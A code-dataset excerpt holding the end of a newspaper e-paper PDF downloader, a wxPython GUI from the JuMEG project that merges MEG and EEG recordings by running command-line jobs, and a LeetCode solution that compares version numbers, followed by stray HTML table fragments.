self.nbtepaper.format(\n pgno=pageno,\n edition=self.edition,\n date=self.date\n )\n )\n if response.status_code == 200:\n content = response.text\n break\n else:\n print(\"Error: no response recieved on page %d, trying again in 5 seconds\" % pageno)\n sleep(5)\n if content is not None: \n filename = self.paper_path + \"{:02d}.pdf\".format(pageno)\n url = self.__generatePDFURL(pageno)\n print(\"Status: Generating File-{}\".format(filename))\n if not write(filename=filename, url=url):\n print(\"Error: Could not download newspaper for this date\")\n return False\n\n filename = self.publishDate.strftime(\"NBT %d %B %Y.pdf\")\n if not merge(self.paper_path, filename):\n print(\"Error: Could not create PDF for newspaper\")\n return False\n return filename\n","repo_name":"devRawnie/NBT-Epaper","sub_path":"epaperHandler.py","file_name":"epaperHandler.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23476821673","text":"#!/usr/bin/env python3\n# -+-coding: utf-8 -+-\n\n\"\"\"\nJuMEG GUI to merge MEG (FIF) and EEG data (BrainVision)\ncall <jumeg_merge_meeeg> with meg and eeg file and parameters\n\"\"\"\n\n#--------------------------------------------\n# Authors: Frank Boers <f.boers@fz-juelich.de>\n#\n#--------------------------------------------\n# Date: 21.11.18\n#--------------------------------------------\n# License: BSD (3-clause)\n#--------------------------------------------\n# Updates\n#--------------------------------------------\nimport os\nimport wx\nfrom pubsub import pub\n\n#--- jumeg wx stuff\nfrom jumeg.gui.wxlib.jumeg_gui_wxlib_main_frame import JuMEG_wxMainFrame\nfrom jumeg.gui.wxlib.jumeg_gui_wxlib_main_panel import JuMEG_wxMainPanel\nfrom jumeg.gui.wxlib.utils.jumeg_gui_wxlib_utils_controls import JuMEG_wxSplitterWindow,JuMEG_wxCMDButtons,JuMEG_wxControlGrid,JuMEG_wxControlButtonPanel\n\n#--- Experiment Template\nfrom jumeg.gui.wxlib.jumeg_gui_wxlib_experiment_template import JuMEG_wxExpTemplate\n#---Merger CTRLs\nfrom jumeg.gui.wxlib.jumeg_gui_wxlib_psel_meeg import JuMEG_wxPselMEEG\n#---\nfrom jumeg.gui.wxlib.jumeg_gui_wxlib_pbshost import JuMEG_wxPBSHosts\nfrom jumeg.gui.jumeg_gui_wx_argparser import JuMEG_GUI_wxArgvParser\n#---\nfrom jumeg.base.jumeg_base import jumeg_base as jb\nfrom jumeg.base.ioutils.jumeg_ioutils_subprocess import JuMEG_IoUtils_SubProcess\n\n__version__=\"2019.05.14.001\"\n\nclass JuMEG_wxMEEGMergerPanel(JuMEG_wxMainPanel):\n \"\"\"\n GUI Panel to merge EEG and MEG data into MNE fif format\n \"\"\"\n\n def __init__(self, parent,name=\"JUMEG_MEEG_MERGER\",**kwargs):\n super().__init__(parent,name=name,ShowTitleB=False)\n \n self.ShowCmdButtons = True\n self.ShowTopPanel = True\n self.ShowTitleA = True\n self.ShowTitleB = True\n self.ShowMinMaxBt = True\n self.module_path = os.getenv(\"JUMEG_PATH\") + \"/jumeg/tools/\"\n self.module_name = \"jumeg_io_merge_meeg\"\n self.module_extention = \".py\"\n self.SubProcess = JuMEG_IoUtils_SubProcess()\n self._template_panel_name = \"EXPERIMENT_TEMPLATE\"\n self._init(**kwargs)\n\n @property\n def fullfile(self): return self.module_path+\"/\"+self.module_name+ self.module_extention\n\n def update(self,**kwargs):\n self.stage = kwargs.get(\"stage\", os.getenv(\"JUMEG_PATH_JUMEG\", os.getcwd()) + \"/preproc\" )\n #-- update wx CTRLs\n self.PanelA.SetTitle(v=\"PDF`s\")\n #---\n ds=1\n LEA = wx.ALIGN_LEFT | wx.EXPAND | wx.ALL\n #-- Top\n self.ExpTemplate = JuMEG_wxExpTemplate(self.TopPanel,name=self.GetName()+\".\"+self._template_panel_name)\n self.HostCtrl = JuMEG_wxPBSHosts(self.TopPanel, prefix=self.GetName())\n self.TopPanel.GetSizer().Add(self.ExpTemplate,3,LEA,ds)\n self.TopPanel.GetSizer().Add(self.HostCtrl,1, wx.ALIGN_RIGHT | wx.EXPAND | wx.ALL,ds)\n #--- A IDs;PDFs\n self.PDFBox = JuMEG_wxPselMEEG(self.PanelA.Panel,name=self.GetName()+\".PDFBOX_MEEG\",**kwargs)\n self.PanelA.Panel.GetSizer().Add(self.PDFBox, 1, LEA,ds)\n # --- B right\n self.AP = JuMEG_GUI_wxArgvParser(self.PanelB.Panel,name=self.GetName()+\".AP\",use_pubsub=self.use_pubsub, fullfile=self.fullfile,\n module=self.module_name, ShowParameter=True)\n self.PanelB.Panel.GetSizer().Add(self.AP, 1, LEA,ds)\n self.PanelB.SetTitle(\"\")\n #---\n self.Bind(wx.EVT_BUTTON, self.ClickOnCtrls)\n self.update_argparser_parameter()\n \n def update_on_display(self):\n self.SplitterAB.SetSashPosition(self.GetSize()[0] / 2.0,redraw=True)\n \n def update_argparser_parameter(self):\n \"\"\" update parameter BADS_LIST from template\"\"\"\n self.AP.update_parameter(\"BADS_LIST\",self.ExpTemplate.TMP.bads)\n \n def _update_hosts(self):\n pass\n\n def ClickOnExperimentTemplateUpdate(self,stage=None,scan=None,data_type=None):\n \"\"\"\n call PDFSelectionBox.update_ids and update PDF.ID.listbox\n reset PDFs for new selection\n\n Parameter\n ---------\n stage: stage / path to data\n scan: name of scan\n data_type: mne / eeg\n \"\"\"\n self.PDFBox.update(stage=stage,scan=scan,reset=True,verbose=self.verbose,debug=self.debug)\n self.update_argparser_parameter()\n \n def init_pubsub(self, **kwargs):\n \"\"\" init pubsub call overwrite \"\"\"\n # pub.subscribe(self.ClickOnApply,self.GetName().upper()+\".BT_APPLY\")\n pub.subscribe(self.ClickOnExperimentTemplateUpdate, self.ExpTemplate.GetMessage(\"UPDATE\"))\n \n def ClickOnApply(self):\n \"\"\"\n get selected pdfs structure\n make commands with argparser parameter\n apply cmds to subprocess\n\n \"\"\"\n \n self.PDFBox.verbose = self.verbose\n pdfs = self.PDFBox.GetSelectedPDFs()\n if not pdfs:\n wx.CallAfter(pub.sendMessage,\"MAIN_FRAME.MSG.ERROR\",data=\"\\nPlease select PDFs first\\n in: \" + self.GetName())\n return\n \n #cmd_parameter = self.AP.GetParameter()\n cmd_command = self.AP.get_fullfile_command(ShowFileIO=True)\n joblist = []\n\n #--- del \"stage\"\n cmd_list = cmd_command.split()\n for k in [\"--meg_stage\",\"--eeg_stage\",\"-smeg\",\"-seeg\",\"--list_path\"]:\n for idx in range(len(cmd_list)):\n if cmd_list[idx].startswith(k):\n del cmd_list[idx]\n break\n \n cmd_command = \" \".join(cmd_list)\n # print(cmd_command)\n \n for subject_id in pdfs.get('mne'):\n for idx in range( len( pdfs['mne'][subject_id] ) ):\n if not pdfs['mne'][subject_id][idx][\"selected\"]: continue\n cmd = cmd_command\n eeg_idx = pdfs[\"eeg_index\"][subject_id][idx]\n cmd += \" --meg_stage=\" + pdfs[\"stage\"]\n cmd += \" -fmeg \" + pdfs[\"mne\"][subject_id][idx][\"pdf\"]\n cmd += \" --eeg_stage=\" + pdfs[\"stage\"]\n cmd += \" -feeg \" + pdfs[\"eeg\"][subject_id][eeg_idx][\"pdf\"]\n #cmd += \" \"+ cmd_parameter\n joblist.append( cmd )\n \n if self.verbose:\n wx.LogMessage(jb.pp_list2str(joblist, head=\"MEEG Merger Job list: \"))\n wx.LogMessage(jb.pp_list2str(self.HostCtrl.HOST.GetParameter(),head=\"HOST Parameter\"))\n if joblist:\n # wx.CallAfter(pub.sendMessage,\"SUBPROCESS.RUN.START\",jobs=joblist,host_parameter=self.HostCtrl.HOST.GetParameter(),verbose=self.verbose)\n wx.CallAfter(self.SubProcess.run,jobs=joblist,host_parameter=self.HostCtrl.HOST.GetParameter(),verbose=self.verbose)\n \n def ClickOnCancel(self,evt):\n wx.LogMessage( \"<Cancel> button is no in use\" )\n wx.CallAfter( pub.sendMessage,\"MAIN_FRAME.MSG.INFO\",data=\"<Cancel> button is no in use\")\n\n def ClickOnCtrls(self, evt):\n obj = evt.GetEventObject()\n #print(obj.GetName())\n if obj.GetName() == self.GetName()+\".BT.APPLY\":\n self.ClickOnApply()\n elif obj.GetName() == self.GetName()+\".BT.CLOSE\":\n wx.CallAfter( pub.sendMessage, \"MAIN_FRAME.CLICK_ON_CLOSE\",evt=evt)\n #else:\n # evt.Skip()\n\nclass JuMEG_GUI_MEEGMergeFrame(JuMEG_wxMainFrame):\n def __init__(self,parent,id,title,pos=wx.DefaultPosition,size=[1024,768],**kwargs):\n style = wx.DEFAULT_FRAME_STYLE | wx.NO_FULL_REPAINT_ON_RESIZE\n super().__init__(parent,id, title, pos, size, style,**kwargs)\n self.template_path = None\n\n def update(self,**kwargs):\n return JuMEG_wxMEEGMergerPanel(self,**kwargs)\n \n def UpdateAboutBox(self):\n self.AboutBox.description = \"merging EEG data <*.vhdr> into MEG data <*.fif>\"\n self.AboutBox.version = __version__\n self.AboutBox.copyright = '(C) 2018 Frank Boers <f.boers@fz-juelich.de>'\n self.AboutBox.developer = 'Frank Boers'\n self.AboutBox.docwriter = 'Frank Boers'\n\nif __name__ == '__main__':\n app = wx.App()\n frame = JuMEG_GUI_MEEGMergeFrame(None,-1,'JuMEG MEEG MERGER',module=\"jumeg_preproc_merge_meeg\",function=\"get_args\",ShowLogger=True,ShowCmdButtons=True,ShowParameter=True,debug=True,verbose=True)\n app.MainLoop()\n","repo_name":"jdammers/jumeg","sub_path":"jumeg/gui/jumeg_gui_meeg_merger.py","file_name":"jumeg_gui_meeg_merger.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"16020790150","text":"class Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n p1 = p2 = 0\n version1 = version1.split('.')\n version2 = version2.split('.')\n \n # if passed the first while loop, the two versions \n # have the same valued prefix\n while p1 < len(version1) and p2 < len(version2):\n if int(version1[p1]) > int(version2[p2]):\n return 1\n elif int(version1[p1]) < int(version2[p2]):\n return -1\n p1 += 1\n p2 += 1\n \n # edge case: the rest of the longer version is just 0\n while p1 < len(version1):\n if int(version1[p1]) != 0:\n return 1\n p1 += 1\n \n while p2 < len(version2):\n if int(version2[p2]) != 0:\n return -1\n p2 += 1\n \n return 0\n ","repo_name":"radioheado/Leetcode","sub_path":"Python3/165. Compare Version Numbers.py","file_name":"165. Compare Version Numbers.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
    易票联订单号支付业务交易状态交易情况
    ' + test[0] + '' + test[1] + '' + test[2] + '' + test[3] + '
    ' + test[0] + '' + test[1] + '' + test[2] + '' + test[3] + '